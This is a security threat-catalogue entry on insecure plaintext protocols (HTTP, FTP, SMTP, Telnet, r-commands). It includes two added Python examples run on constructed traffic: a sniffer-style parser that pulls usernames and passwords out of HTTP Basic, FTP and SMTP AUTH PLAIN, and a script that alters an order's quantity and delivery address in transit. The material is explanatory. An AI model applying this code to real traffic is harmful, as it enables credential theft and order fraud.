T 2.87 Use of insecure protocols in public networks
When communication takes place over public networks, especially the internet, the use of insecure protocols gives rise to a series of threats.
One serious threat is that confidential information falls into the wrong hands. Protocols that transmit information in plain text in particular must be regarded as insecure. Since the route taken by data packets across the internet can be neither predicted nor controlled, the information transmitted can be read at any point along that route. This is particularly critical when the data contains the following types of information:
- authentication data such as user names and passwords,
- authorisation data, for example transaction numbers for electronic banking or electronic brokerage,
- other confidential information, for example the information in documents sent by e-mail.
Examples of protocols transmitting all information in plain text include:
- the Hypertext Transfer Protocol (HTTP), used for communication between web browsers and web servers,
- the Telnet protocol, which is still used in some places for remote logins,
- the File Transfer Protocol (FTP), which is still commonly used to access servers offering files for download; user name, password and file contents are all transmitted in plain text,
- the Simple Mail Transfer Protocol (SMTP), used to transmit e-mail,
- the rsh (remote shell) and rlogin (remote login) protocols, as well as related r-commands such as rcp.
With such protocols, all information transmitted can be read, and possibly also modified, on any computer along the communication path. The transmission of credit card numbers and passwords over the internet via HTTP connections is particularly critical.
Using password sniffers, passwords can be read while they are being transmitted to a system. This gives the attacker access to that IT system and, from there, the opportunity to carry out further attacks locally on the computer.
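The following added example (not part of the original threat catalogue entry) shows how little a password sniffer has to do once it sees plaintext traffic. The client-to-server payloads are constructed, not captured; the server addresses, user names and passwords are invented. It recovers credentials from HTTP Basic authentication, an FTP login and SMTP AUTH PLAIN, the three protocols from the list above for which the login exchange is simply readable text (HTTP Basic and AUTH PLAIN are base64, which is an encoding, not encryption):

```python
"""Recovering credentials from plaintext protocol traffic (added example).

The client -> server payloads below are constructed, not captured. They
show what a sniffer on any hop between client and server sees for HTTP
Basic authentication, an FTP login and SMTP AUTH PLAIN.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Credential:
    protocol: str
    server: str
    username: str
    password: str


# Constructed sample traffic keyed by (server address, server port).
# Only the client -> server direction is needed to recover the secrets.
SAMPLE_STREAMS = {
    ("203.0.113.10", 80): (
        b"GET /account HTTP/1.1\r\n"
        b"Host: shop.example\r\n"
        b"Authorization: Basic YWxpY2U6czNjcjN0\r\n"  # base64 of "alice:s3cr3t"
        b"\r\n"
    ),
    ("203.0.113.20", 21): b"USER carol\r\nPASS letmein\r\nLIST\r\n",
    ("203.0.113.30", 25): (
        b"EHLO client.example\r\n"
        b"AUTH PLAIN AGJvYgBodW50ZXIy\r\n"  # base64 of "\0bob\0hunter2"
        b"MAIL FROM:<bob@example.org>\r\n"
    ),
}


def _lines(payload: bytes) -> list:
    return payload.decode("latin-1").split("\r\n")


def _b64(text: str) -> Optional[str]:
    """Decode strictly; return None for anything that is not valid base64."""
    try:
        return base64.b64decode(text, validate=True).decode("latin-1")
    except ValueError:  # binascii.Error is a subclass of ValueError
        return None


def http_basic_credentials(payload: bytes) -> list:
    """HTTP Basic auth is only base64("user:password")."""
    found = []
    for line in _lines(payload):
        m = re.match(r"(?i)authorization:\s*basic\s+(\S+)", line)
        decoded = _b64(m.group(1)) if m else None
        if decoded is not None and ":" in decoded:
            user, _, password = decoded.partition(":")
            found.append((user, password))
    return found


def ftp_credentials(payload: bytes) -> list:
    """FTP sends USER and PASS as separate plaintext commands."""
    found, user = [], None
    for line in _lines(payload):
        cmd, _, arg = line.partition(" ")
        if cmd.upper() == "USER":
            user = arg
        elif cmd.upper() == "PASS" and user is not None:
            found.append((user, arg))
            user = None
    return found


def smtp_plain_credentials(payload: bytes) -> list:
    """SMTP AUTH PLAIN carries base64("authzid\\0authcid\\0password"),
    either on the AUTH line itself or on the following client line."""
    found, lines, i = [], _lines(payload), 0
    while i < len(lines):
        m = re.match(r"(?i)auth\s+plain(?:\s+(\S+))?$", lines[i])
        if m:
            blob = m.group(1)
            if blob is None and i + 1 < len(lines):  # two-step form
                i += 1
                blob = lines[i]
            decoded = _b64(blob) if blob else None
            if decoded is not None and decoded.count("\0") == 2:
                _, authcid, password = decoded.split("\0")
                found.append((authcid, password))
        i += 1
    return found


# Dispatch on the well-known server port of each plaintext protocol.
EXTRACTORS = {
    80: ("HTTP", http_basic_credentials),
    21: ("FTP", ftp_credentials),
    25: ("SMTP", smtp_plain_credentials),
}


def sniff(streams: dict) -> list:
    found = []
    for (server, port), payload in streams.items():
        if port in EXTRACTORS:
            name, extract = EXTRACTORS[port]
            for user, password in extract(payload):
                found.append(Credential(name, server, user, password))
    return found


if __name__ == "__main__":
    for c in sniff(SAMPLE_STREAMS):
        print(f"{c.protocol:5} {c.server:15} {c.username}:{c.password}")
```

The point of the example is not the code but how short it is: no cryptanalysis is involved, only splitting lines and undoing base64. Telnet and rlogin are omitted because their logins are typed character by character, but the keystrokes are just as readable on the wire.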
Man-in-the-middle attacks and session hijacking are potential threats when using any of the protocols mentioned, especially HTTP or Telnet (see T 5.89 Hijacking of network connections). In these attacks, an attacker can not only read information but also actively cause damage by changing the transactions currently being processed. For example, prices or order quantities in orders placed over the internet can be altered so that the person placing the order sees and receives confirmation only for the items and the delivery address he/she entered, while the attacker forwards an order to the seller for a significantly larger quantity, which is then shipped to a different delivery address.
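The order-tampering scenario just described, as an added example that is not part of the original entry. The HTTP request, shop host and order fields are constructed. It shows why plain HTTP offers no protection here: a host on the path can rewrite the form body and recompute Content-Length, and the rewritten request is indistinguishable from a genuine one for the seller, while the buyer's browser never sees the change:

```python
"""Tampering with an order sent over plain HTTP (added example).

The request below is constructed. A host on the path between buyer and
shop rewrites the order body; because plain HTTP provides no integrity
protection, neither side can detect the change.
"""
from urllib.parse import parse_qsl, urlencode


def split_request(raw: bytes):
    """Split a raw HTTP/1.1 request into request line, header dict and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers, body


def build_request(request_line: str, headers: dict, body: bytes) -> bytes:
    """Serialise a request; Content-Length is always recomputed from the body."""
    headers = dict(headers)
    headers["Content-Length"] = str(len(body))
    head = "\r\n".join([request_line] + [f"{k}: {v}" for k, v in headers.items()])
    return head.encode("latin-1") + b"\r\n\r\n" + body


def order_fields(raw: bytes) -> dict:
    """Form fields of the order body, as the shop will interpret them."""
    _, _, body = split_request(raw)
    return dict(parse_qsl(body.decode("latin-1"), keep_blank_values=True))


def content_length_ok(raw: bytes) -> bool:
    """True when the Content-Length header matches the body actually sent."""
    _, headers, body = split_request(raw)
    return int(headers.get("Content-Length", -1)) == len(body)


# Constructed: the order exactly as the buyer's browser put it on the wire.
BUYER_REQUEST = build_request(
    "POST /checkout HTTP/1.1",
    {"Host": "shop.example",
     "Content-Type": "application/x-www-form-urlencoded"},
    urlencode({"item": "widget", "quantity": "1",
               "address": "1 Main St, Springfield"}).encode("latin-1"),
)


def tamper_order(raw: bytes, quantity: int, address: str) -> bytes:
    """What an on-path host can do: change quantity and delivery address
    and fix up Content-Length so the shop accepts the rewritten request."""
    request_line, headers, body = split_request(raw)
    fields = dict(parse_qsl(body.decode("latin-1"), keep_blank_values=True))
    fields["quantity"] = str(quantity)
    fields["address"] = address
    return build_request(request_line, headers, urlencode(fields).encode("latin-1"))


if __name__ == "__main__":
    forwarded = tamper_order(BUYER_REQUEST, 500, "Drop Point 7, Elsewhere")
    print("buyer sent:   ", order_fields(BUYER_REQUEST))
    print("shop received:", order_fields(forwarded))
```

Nothing in the rewritten request reveals the modification: the request line, Host header and encoding are untouched, and Content-Length is consistent with the new body. Only a protocol that authenticates and integrity-protects the whole exchange lets the seller, or the buyer, notice.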
In addition to the protocols mentioned, which transmit all information in plain text, there are protocols that at least allow the transmission of the authentication data to be encrypted. Even with these, however, the risk remains that the payload data transmitted afterwards can be read.